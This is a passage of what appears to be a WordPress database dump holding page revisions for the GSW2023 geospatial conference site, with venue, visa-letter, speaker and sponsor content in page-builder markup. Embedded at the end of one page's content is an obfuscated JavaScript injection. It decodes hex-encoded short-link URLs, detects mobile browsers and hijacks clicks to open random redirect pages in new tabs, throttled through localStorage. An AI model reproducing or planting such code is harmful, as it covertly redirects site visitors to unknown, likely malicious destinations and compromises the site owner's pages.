main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 12:24:51','2023-08-13 12:24:51','',3066,'https://gsw2023.com/?p=5109',0,'revision','',0),
(5110,1,'2023-08-13 12:25:30','2023-08-13 12:25:30','<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h1>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 155px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]\r\n\r\n<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" 